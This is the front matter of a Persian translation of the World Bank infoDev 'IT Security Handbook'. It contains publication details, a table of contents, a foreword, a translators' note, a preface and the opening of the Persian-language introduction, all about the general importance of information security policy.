
IT Security Handbook
Authors:
George Sadowsky
James X. Dempsey
Alan Greenberg
Barbara J. Mack
Alan Schwartz
Translators:
Mehdi Mirdamadi
Zahra Shojaei
Mohammad Javad Samadi
Secretariat of the Supreme Council of Information
Tir 1384
IT Security Handbook (Persian title: راهنمای امنیت فناوری اطلاعات) / authors George Sadowsky ... [et al.]; translators Mehdi Mirdamadi, Zahra Shojaei, Mohammad Javad Samadi. -- Tehran: Supreme Council of Information, Secretariat, 1384.
509 p.: tables. 50,000 rials
ISBN: 964-8846-26-x
Title in English: IT Security Handbook
Cataloguing based on CIP (FIPA) data.
Bibliography: p. 509; also as footnotes. Index.
1. Information technology -- Security measures. A. Sadowsky, George. B. Mirdamadi, Mehdi, 1359- , translator. C. Shojaei, Zahra, translator. D. Samadi, Mohammad Javad, translator. E. Supreme Council of Information. Secretariat. F. Title.
T58/5/ر23 1384
National Library of Iran
303/4833
م84-17525

This book is a translation of:
George Sadowsky; James X. Dempsey; Alan Greenberg; Barbara J. Mack; Alan Schwartz; IT Security Handbook; infoDev, Worldbank; 2003.
(ISBN: 964-03-9951-5; http://www.infodev-security.net/handbook)

IT Security Handbook
© Copyright 1383, Secretariat of the Supreme Council of Information
Authors: George Sadowsky, James X. Dempsey, Alan Greenberg, Barbara J. Mack, Alan Schwartz
Translators: Mehdi Mirdamadi, Zahra Shojaei, Mohammad Javad Samadi
Technical editing: Mehdi Mirdamadi
Layout and copy preparation: Maria Ghaderi
Lithography, printing and binding: Golvazheh Publishing Company
Print supervisor: Saeed Zeraati
Printing: first, 1384
Print run: 1500 copies
ISBN: 964-8846-26-x
Secretariat publication serial number: 84-14
Price: 50,000 rials
Postal address: Tehran, Shariati Street, before the Shahid Ghoddousi intersection, corner of Andisheh 1, No. 808
Telephone: 88448037 and 88448038; Fax: 88448038; P.O. Box: 16315-1315
Website: http://www.scict.ir
Contents

Foreword
Translators' Note
Preface
Introduction
Executive Summary

Part One. IT Security in the Digital Age

Part Two. IT Security and Individual Users
Chapter 1. Introduction
Chapter 2. Understanding Security Concepts
Chapter 3. Computer and Data Security
Chapter 4. Operating System and Application Software Security
Chapter 5. Malicious Software
Chapter 6. Network Services Security
Chapter 7. Tools for Improving Security
Chapter 8. Platform-Specific Notes
Annex 1. Introduction to Encoding and Encryption
Annex 2. TCP/IP
Annex 3. Glossary of Technical Terms

Part Three. IT Security and Organizations
Chapter 1. Introduction
Chapter 2. Overview of Methods for Mitigating Electronic Security Risks
Chapter 3. Risk Assessment and Loss Analysis
Chapter 4. Planning for Security Needs
Chapter 5. Prevention and Organizational Security Policy
Chapter 6. Personnel Security
Chapter 7. Security Outsourcing
Chapter 8. Legislation, Government Regulation and Privacy Policies
Chapter 9. Computer Crime
Chapter 10. Mobile Risk Management: Electronic Financial Services in the Wireless Environment
Chapter 11. Best Practices: Building a Security Culture
Chapter 12. E-Commerce Safety Rules for All Users and Companies
Chapter 13. International Dialogue on Security

Part Four. IT Security and Government Policy
Chapter 1. Introduction
Chapter 2. Protecting Government Systems
Chapter 3. The Role of Law and Government Policy in the Private Sector
Chapter 4. Government Cyber-Security Policies

Part Five. IT Security and Technical Administrators
Chapter 1. Introduction
Chapter 2. Security for Administrators
Chapter 3. Physical Security
Chapter 4. Information Security
Chapter 5. Identification and Authentication
Chapter 6. Server Security
Chapter 7. Network Security
Chapter 8. Types of Attacks and Countermeasures
Chapter 9. Intrusion Detection and Management
Chapter 10. Platform-Specific Notes

Part Six. Appendices
Appendix 1. Glossary
Appendix 2. Bibliography
Appendix 3. Electronic Resources
Appendix 4. Security Organizations
Appendix 5. Print Resources

Common Security Terms and Expressions
Foreword

In the real world, security has always been a vital and thoroughly familiar concept for humankind. In prehistoric times, security was an entirely physical notion consisting of the basics of survival, such as safety from attack by other people or animals and the security of the food supply. Gradually other needs were added to these earlier ones, such as safety from natural disasters and disease, and having a place to live and rest without facing danger. As civilization advanced and societies took shape, the scope of security widened greatly; with the separation of individuals' property and personal rights from one another and from public property, and with the definition of national and international domains, it gradually came to include broad concepts such as privacy, social security, financial security, political security, national security and economic security. Although these concepts were no longer confined entirely to humankind's physical needs, realizing and attaining them still mostly required the existence or use of real, physical environments.

In recent decades, however, and especially in the past five years, the world has seen striking changes that have fundamentally altered many earlier relationships and equations. These changes, made possible by the widespread use of information and communication technology, began with the use of computers as a tool for automation and higher productivity, and now, as that use has evolved to create a space for collaborative synergy (collaboration), they have in practice transformed the individual and social life of humankind. Many experts believe that, just as the emergence of writing had such a profound effect on human destiny that historians divide the story of human life on this planet into prehistory and history, entry into the virtual space created by modern information and communication technology has likewise opened a new era of human civilization, in which the information-age revolution has transformed the way we think, produce, consume, trade, manage, communicate, wage war, and even practise religion and love.

This great transformation has brought many requirements and consequences, among the most important of which is the emergence of the new concepts of virtual security, or security in cyberspace. With the shift in what the term "computer network" refers to, from a small workgroup network to a vast global network (the Internet), and given the ever-growing interactions and exchanges that take place over computer networks, electronic protection and security regimes are vital for guaranteeing exchanges and creating legal obligations for the parties involved in them: regimes made up of laws, methods, standards and tools that are even more binding than conventional contracts and traditional methods, and that also guarantee, more than ever, the security and privacy of the sensitive information exchanged.

Information security in virtual environments has always been emphasized as one of the basic infrastructures and requirements for the developmental and pervasive use of ICT. Although absolute security is unattainable in both the real world and virtual space, a level of security that is sufficient and proportionate to the needs and to the investment made is achievable under almost all conditions. Only when such a level is in place will individuals, organizations, private companies and government bodies, trusting the various parties that are all involved in an electronic exchange and that have probably never met and do not know one another, play their expected role as effective nodes in this interactive, synergistic network.

Beyond its broad national-security dimensions, assurance that the country's information assets and infrastructure are secure is the key that unlocks countless new commercial and non-commercial opportunities on the Internet. What is certain is that the security challenge facing the country is not lack of access to technology or the absence of security products; it is policy-making, building a culture, making proper use of existing resources, and adapting them so that they meet the unique needs of the country's network and digital space. In this regard it is essential to note that information security architecture is one of the ongoing processes within information technology architecture at various levels, national and organizational alike, and that within this process the necessary tools are used as appropriate and as needed. Another important point, drawn from the experience of leading countries, is that information security is a cross-sectoral issue that requires broad cooperation. This cooperation must be addressed at both the national and the international level. Defining roles, duties and responsibilities is among the important matters that must be settled in this cooperation.

Today the security of digital space represents a new facet of every country's national security. It is hoped that, in parallel with the rapid development of the various uses of information and communication technology in different sub-sectors under the TAKFA programme, identifying and designating the country's key infrastructures that depend critically on information, followed by appropriate planning, organization and investment to protect them, will smooth the path of the country's all-round development towards a knowledge-based society.

Fortunately, in recent years, following the Cabinet's approval of the Information and Communication Technology Development and Application Programme (TAKFA), which reflected the attention and insight of the country's senior management in taking a new approach to national development, technical studies and reviews to prepare for security needs and security in computing environments have begun and have grown rapidly. The findings of the relevant working group led to the recognition of wider areas of need, and on that basis, with the approval of the honourable Cabinet and the honourable President, the Supreme Council for the Security of the Country's Computer and Internet Environment has begun work under the responsibility of the honourable First Vice-President; God willing, the results of its reviews and decisions will soon be announced in the form of directives and a national document on the security of the country's computing space.

In continuing its related activities, the Secretariat of the Supreme Council of Information seeks to strengthen the country's existing knowledge in the field of information technology by preparing, translating and authoring technical material in a suitable setting. The present book is one of the very useful, comprehensive and recent documents in the field of computer technology security, and is presented to those working in the country's ICT sector.

Nasrollah Jahangard
Secretary of the Supreme Council of Information and
Special Representative of the President
Translators' Note

The proper use of correct information is one of the most important requirements for organizations to achieve their goals, and the reliability, integrity and availability of that information are very important characteristics in its effectiveness. The advantages of storing information electronically have made the widespread use of computers for business purposes inevitable, and the use of computer networks, especially the Internet, has fundamentally changed the way business is done and has put a very large volume of information only a fingertip away from us; and it goes without saying that in this complex environment with its extensive connections, wide-ranging risks threaten computer systems, information systems, and the critical activities and infrastructures that depend on them.

In today's world, funds are increasingly moved electronically, information of greater and lesser sensitivity is transmitted over networks, computer systems are very rapidly becoming more complex and more connected to the outside world, and simple tools for intrusion and for exploiting vulnerabilities are more available than ever to the adventurers and criminals of the virtual world; each of these factors alone is a strong reason to take security seriously.

The overwhelming majority of organizations are exposed to all kinds of internal and external threats from saboteurs, such as tampering with reference information or theft of critical information and information assets. Under such conditions, factors that can count among a system's advantages (such as speed and high accessibility) may, if not kept under control, give rise to vulnerabilities, and their misuse by ill-intentioned people can lead to intrusion and sabotage, fraud, or extortion. In addition, natural problems and unintentional errors made by computer users can have destructive results where there are no proper procedures for protecting information.

Alongside all of this, organized crime in the virtual world adds to the complexity of governments' task of securing the critical infrastructure of public services, and the seriousness of the misuse of government resources doubles the importance of governments addressing security properly and effectively. The latest global statistics on incidents at government and commercial websites caused by viruses, worms and denial-of-service attacks illustrate the vulnerability of these systems well. According to estimates by the security agencies of the United States (which is regarded as a leader in information and communication technologies), in 2003 alone the losses from breaches of organizations' security were estimated at more than 10 billion dollars.

Given all this, devising and implementing security measures against these widespread threats is an unavoidable necessity for organizations. Appropriate measures can minimize the likelihood of incidents, keep the damage very small when they do occur, and provide the ability to respond quickly and effectively, so that organizations use predefined processes to repair the damage, the productivity and safety of information increase, and business continues with greater peace of mind.

The IT Security Handbook was compiled, once the need to address security had been recognized, at the request of the World Bank by the infoDev group (one of the World Bank's subsidiaries) as an effort to raise the level of IT security in the member countries of this international body, and was first distributed to participants at the first World Summit on the Information Society (WSIS) in Switzerland in December 2003. The contents of the book are the result of reviewing a large number of books, articles, theses and specialist documents by experts and specialists in this field around the world. A complete list of these references appears in Part Six (Appendices), and readers can consult them to learn about the latest points and topics as well.

In addition to presenting a set of general security definitions and solutions, the present book also considers their technical and managerial aspects, and in both the original text and its translation an effort has been made, as far as possible, to present the material in such a way that understanding it requires no specialist knowledge of the field and it can be of use to a broad community of IT users (especially managers); some of its chapters can therefore be used in training seminars and short courses.

Worldwide, numerous books have been published on information and communication technology security, and recently some of them have been translated into Persian by experienced or young translators; but because they usually deal with a specialist topic within security, they lack a high-level, managerial view of the subject. The book before you takes a high-level view of security and tries to explain the concepts that arise in each of its areas; where necessary it has not neglected the technical aspects, yet it never goes so far into technical matters as to lose its broad perspective, leaving that to specialist security books.

The translators have always tried to remain faithful in conveying the concepts and points of this book, never sacrificing meaning to wording, and in many cases they have coined terms or equivalents, which is exhausting and responsible work. Other terms for which no Persian equivalent was found or coined are repeated in their original form in the translation. We hope that readers, whether experts, professors, students or other interested people, will let us know of any slips and shortcomings in this book through their suggestions and criticisms, so that we can set about correcting them.

To avoid confusing readers who have only recently become interested in information security and are not yet very familiar with security terms and their common equivalents, a list of the common security terms used in the book, together with the Persian equivalent used for each, has been included at the end of the book. The layout of the book also follows that of the original: except for Part Five, where the full width of the page is used for text because of the large amount of technical text and program listings, the other parts use a two-column layout.

Finally, we feel obliged to sincerely thank Ms Maryam Eftekhari and Messrs Mohammad Mehdi Jaghouri, Afshin Lamei and Nima Lotfi, who took pains in the preparation of this work; all the professors and experts whose expert and helpful comments encouraged us in this task; all the colleagues who in one way or another played a part in preparing and arranging this work; and the Secretariat of the Supreme Council of Information, which undertook the printing and publication of this book.

We hope that this text may have some effect, however small, on the country's progress and development on the way to a prosperous, free and proud Iran.

The Translators
Summer 1384
Preface

All funding for the preparation of this book was provided by the infoDev Program of the World Bank Group. In recent years IT security has become especially important, and for that reason it has attracted the attention of the infoDev Technical Advisory Panel. We would like to express our thanks and gratitude to the State Secretariat of Economic Affairs of Switzerland (SECO), not only for funding this project but also for recognizing the urgency of the issue and bringing this book to fruition.

Information and communication technology (ICT) plays an important role in economic and social development, but it should not be forgotten that effective use of ICT is impossible in an insecure and unreliable environment. IT security therefore has a fundamental and decisive role in creating the conditions needed for the successful implementation of national ICT plans, e-government, e-commerce, and projects in education, health, or finance and credit.

IT security is a complex subject that evolves almost in step with the technology. In this book the authors have managed to offer the best practices and recommendations, independent of technology, for specific IT environments. Readers can also visit the website www.infodev-security.net to obtain up-to-date and relevant information and, through this steady flow of information, keep abreast of new developments in IT security. While the material presented in this book does not necessarily reflect the views of infoDev or the World Bank Group, we believe that using the book together with its website can greatly help the understanding of IT security issues around the world.

The book consists of five parts, each of which can be read separately. After a short introduction to the general topics of IT security, you will find material and discussions suited to individual users, small and medium-sized organizations, government, and technical administrators. Although most published research and articles on IT security come from developed countries, the authors have tried to provide practical and effective guidelines that can also be used in developing countries.

We hope that the publication of this book and the launch of its website will be the starting point of an interactive process in which practices and technology advance together; and what matters most along the way is that readers of the book share their own suitable and effective methods and practices with others.

Mohsen A. Khalil: Director, International Information and Communication Technology Department, World Bank Group
Bruno Lanvin: Manager, infoDev Program, World Bank Group
Michel A. Maechler: Task Manager for information development, Senior Informatics Specialist, World Bank Group
‫ﭘﻴﺶﺩﺭﺁﻣﺪ‬
‫ﺳـﻴﺮ ﭘﻴـﺸﺮﻓﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﻧﻮﺁﻭﺭﻳﻬــﺎﻱ‬
‫ﺣﺎﺻﻞ ﺍﺯ ﺁﻥ ﻣﻮﺟﺐ ﺍﻓﺰﺍﻳﺶ ﭼـﺸﻤﮕﻴﺮ ﺑﻬـﺮﻩﻭﺭﻱ ﻭ ﭘﻴـﺪﺍﻳﺶ‬
‫ﺍﻧــﻮﺍﻉ ﺟﺪﻳــﺪﻱ ﺍﺯ ﻛﺎﻻﻫــﺎ ﻭ ﺧــﺪﻣﺎﺕ ﺷــﺪﻩ ﺍﺳــﺖ‪ .‬ﺑــﺎ ﺑﻬﺒــﻮﺩ‬
‫ﺭﻭﺯﺍﻓﺰﻭﻥ ﻗﺪﺭﺕ‪ ،‬ﻇﺮﻓﻴﺖ ﻭ ﻗﻴﻤﺖ ﺗﺠﻬﻴﺰﺍﺕ ﻣﻴﻜﺮﻭﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻛﻪ ﺑﻪ ﺭﺷﺪ ﺳﺎﻻﻧﺔ ﺗﻘﺮﻳﺒﹰﺎ ‪ ۳۰‬ﺩﺭﺻـﺪﻱ ﺑﻬـﺮﻩﻭﺭﻱ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﻗﻴﻤﺖ ﻣﻨﺠﺮ ﺷﺪﻩ‪ ،‬ﺍﻣﻜﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺑـﺮﺍﻱ ﻫﻤـﻪ‬
‫ﻣﻴﺴﺮ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻣﺮﻭﺯﻩ ﻣﺎ ﺩﺭ ﺩﻧﻴـﺎﻳﻲ ﺯﻧـﺪﮔﻲ ﻣـﻲﻛﻨـﻴﻢ ﻛـﻪ‬
‫ﭘﺮﺩﺍﺯﺵ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻥ ﺍﺭﺯﺍﻥ ﻭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﺭﺗﺒـﺎﻁ ﺗﻠﻔﻨـﻲ ﺭﻭ‬
‫ﺑﻪ ﻛﺎﻫﺶ ﺍﺳﺖ ﻭ ﺟﻬﺎﻥ ﺑﻄﻮﺭ ﻓﺰﺍﻳﻨـﺪﻩﺍﻱ ﺩﺭ ﺗﺒـﺎﺩﻝ ﻭ ﺗﻌﺎﻣـﻞ‬
‫ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﻣﺎ ﻓﺮﺍﻫﻢ ﺷـﺪﻥ ﺍﻣﻜﺎﻧـﺎﺕ ﻓﻨـﻲ ﺟﺪﻳـﺪ ﺗﻨﻬـﺎ ﺑﺎﻋـﺚ ﭘﻴـﺪﺍﻳﺶ‬
‫ﻣﺤﺼﻮﻻﺕ ﻧﻮﻳﻦ ﻭ ﺭﺍﻫﻬﺎﻱ ﺑﻬﺘﺮ ﻭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻣـﻮﺭ‬
‫ﻧﺸﺪﻩ‪ ،‬ﺑﻠﻜﻪ ﺩﺭ ﻛﻨﺎﺭ ﺁﻥ ﺍﻣﻜﺎﻥ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺭﺍ ﻧﻴـﺰ‬
‫ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﻴـﺰ ﻫﻤﺎﻧﻨـﺪ‬
‫ﺳﺎﻳﺮ ﻓﻨﺎﻭﺭﻳﻬﺎ ﺣﺎﻟﺖ ﺍﺑﺰﺍﺭﻱ ﺩﺍﺭﺩ ﻭ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ ﻛﻪ ﺑﺮﺍﻱ ﻫﻤﮕﺎﻥ ﻣﻔﻴﺪ ﺑﺎﺷﺪ ﻭ ﻳﺎ ﺑﻪ ﻧﺤـﻮﻱ ﺍﺯ‬
‫ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﻛﻪ ﻧﺘﺎﻳﺞ ﺧﻄﺮﻧﺎﻛﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ‪ .‬ﻋﺎﻣﻞ ﺳـﺮﻋﺖ‬
‫ﺩﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﭼﻴﺰﻱ ﺩﺭ ﺣـﺪﻭﺩ ﻣﻴﻜﺮﻭﺛﺎﻧﻴـﻪ‬
‫ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺍﻃﻼﻋﺎﺕ ﻏﻴﺮﻗﺎﺑﻞ ﻣـﺸﺎﻫﺪﻩ ﺑـﺎ ﭼـﺸﻢ‬
‫ﻏﻴﺮﻣﺴﻠﺢ‪ ،‬ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﻬﻴﻪﺷﺪﻩ ﺗﻮﺳﻂ ﺍﻓـﺮﺍﺩ ﺟﺎﺑﺠـﺎ‬
‫ﮔﺮﺩﺩ‪ .‬ﺩﺭ ﭼﻨﻴﻦ ﻓﻀﺎﻳﻲ ﺍﻋﻤﺎﻝ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺨﺮﺏ ﺁﻧﻘﺪﺭ ﺳﺮﻳﻊ‬
‫ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻏﻴﺮﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎﺷﺪ ‪ -‬ﻫﺮﭼﻨﺪ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺁﻥ ﻏﻴﺮ ﻣﻤﻜﻦ ﻧﻴﺴﺖ‪.‬‬
‫ﻣﺸﻜﻼﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ‪ ،‬ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ‬
‫ﻭﺍﺑــﺴﺘﻪ ﺑــﻪ ﺁﻧﻬــﺎ ﻭ ﺫﺧﻴــﺮﻩ ﻭ ﺍﺭﺳــﺎﻝ ﺍﻃﻼﻋــﺎﺕ ﺑــﻪ ﺷــﻜﻞ‬
‫ﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻣــﺴﺎﺋﻞ ﺗــﺎﺯﻩﺍﻱ ﻧﻴــﺴﺘﻨﺪ‪ .‬ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺗﺠــﺎﺭ ﹺ‬
‫ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻧﺰﺩﻳﻚ ﺑﻪ ﭘﻨﺠـﺎﻩ ﺳـﺎﻝ ﻗـﺪﻣﺖ ﺩﺍﺭﻧـﺪ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﻧﻴﺰ ﺍﻧﺘﻘﺎﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭘﻮﻝ ﺭﺍ ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﻫﻤﺎﻥ ﺯﻣـﺎﻥ‬
‫ﺁﻏﺎﺯ ﻛﺮﺩﻩﺍﻧﺪ‪.‬‬
‫ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺠﺎﺭﻱ‪ ،‬ﺑﺮﺍﻱ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﺍﺯ ﻃﺮﻳﻖ ﻧﻔـﻮﺫ‬
‫ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻟﻲ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻱ ﻗـﻮﻱ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﺣﺘﻤـﺎﻝ ﺍﻧﺠـﺎﻡ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬
‫ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﻭ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻗـﻮﻱﺗـﺮ ﺩﺭ ﻋﺮﺻـﺔ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﭘﺮﺩﺍﺯﺵ‪ ،‬ﻃﺮﺣﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﺗﻮﺳﻌﻪﺍﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺁﻏﺎﺯ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﻧﻴﻢﻗﺮﻥ ﺍﺧﻴﺮ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﺴﺎﺋﻞ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩﺍﻧـﺪ‪ .‬ﺍﻧﻘـﻼﺏ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻛﻪ ﺩﺭ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ‪ ۷۰‬ﻣﻴﻼﺩﻱ ﺷﺮﻭﻉ ﺷـﺪ‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻮﺟﺐ ﺷﺪﻩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﺑﺎ ﺍﻧﺪﺍﺯﻩ ﻭ ﻗـﺪﺭﺗﻲ ﻗﺎﺑـﻞ‬
‫ﻣﻼﺣﻈﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﺻﺪﻫﺎ ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪.‬‬
‫ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺩﻳﮕـﺮ ﺍﻧـﻮﺍﻉ ﺷـﺒﻜﻪﻫـﺎﻱ ﺷﺨـﺼﻲ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻴﻦ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﻣﻴـﺎﻥ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﺮﺩﻡ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ‬
‫ﺳﺎﺧﺘﻪﺍﻧﺪ‪ .‬ﺑﻴﺴﺖ ﻭ ﭘﻨﺞ ﺳﺎﻝ ﭘﻴﺶ ﻛـﺎﺭ ﺑـﺎ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺑﺮﻗـﺮﺍﺭﻱ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻋﻤﻮﻣﹰﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ ﺍﻳـﻦ ﺭﺷـﺘﻪ‬
‫ﺻﻮﺭﺕ ﻣﻲ ﭘﺬﻳﺮﻓﺖ؛ ﺍﻣﺎ ﺍﻣـﺮﻭﺯﻩ ﺻـﺪﻫﺎ ﻣﻴﻠﻴـﻮﻥ ﺭﺍﻳﺎﻧـﻪ ﺑـﺮﺍﻱ‬
‫ﭘﺮﺩﺍﺯﺵ ﻫﺮﮔﻮﻧﻪ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺑﻞ ﺗﺼﻮﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﺗﻮﺳﻂ‬
‫ﻳﻚ ﺷﺒﻜﺔ ﺍﺭﺗﺒﺎﻃﻲ ﻗﻮﻱ ﺑﻨﺎﻡ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺍﻳﻦ ﺷﺒﻜﻪ ﻣﻮﺟﺐ ﮔﺴﺘﺮﺵ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺮﺩﻣﻲ ﺍﺯ ﻃﺮﻳـﻖ ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺷﺪﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻣﻜﺎﻥ‬
‫ﺩﺳﺘﺮﺳﻲ ﺁﺳﺎﻥ ﻭ ﻧﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻥ ﺑـﻪ ﻣﻔـﺎﻫﻴﻢ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﺍﺳـﻨﺎﺩ‬
‫ﺗﺠﻬﻴﺰﺍﺕ ﻓﻨﻲ ﻭ ﻣﺤﺼﻮﻻﺕ ﺩﺭﺣـﺎﻝ ﺳـﺎﺧﺖ ﺭﺍ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩﻩ‬
‫ﺍﺳﺖ‪ .‬ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺗﻨﺎﺳﺐ ﭘﻴﺸﺮﻓﺖ ﻓﻨﺎﻭﺭﻱ‪ ،‬ﻣـﺸﻜﻼﺕ‬
‫ﻧﻴﺰ ﺑﻴﺸﺘﺮ ﻣﻲﺷﻮﺩ‪ .‬ﻋﻤﺪﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻫﺔ ‪۷۰‬‬
‫ﻣﻴﻼﺩﻱ ﺭﺍ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺣﺮﻓﻪﺍﻱ ﺭﺍﻳﺎﻧﻪ ﺗﺸﻜﻴﻞ ﻣﻲﺩﺍﺩﻧـﺪ؛ ﺣـﺎﻝ‬
‫ﺁﻧﻜﻪ ﺍﻣﺮﻭﺯ ﺑﻴﺸﺘﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺍﻓﺮﺍﺩ ﻏﻴﺮﺣﺮﻓـﻪﺍﻱ ﻫـﺴﺘﻨﺪ ﻭ ﻟـﺬﺍ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﺪﻡ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﻓﻲ ﺁﻧـﺎﻥ ﺑﺎﻋـﺚ ﺷـﻮﺩ ﻛـﻪ ﺍﺯ‬
‫ﺑﺴﺘﻪ ﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﻳﻤﻦ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻨﺎﺳﺐ ﻧﻜﻨﻨـﺪ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﻭ ﺗﺒﻬﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺻـﺮﻓﻨﻈﺮ ﺍﺯ ﻣﺤـﻞ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ‬
‫ﺧﻮﺩ ﻭ ﻳﺎ ﻛﺎﺭﺑﺮ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺣﻤﻠﻪ ﻭ ﺍﺯ ﺁﻥ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻧﻤﺎﻳﻨﺪ‪.‬‬
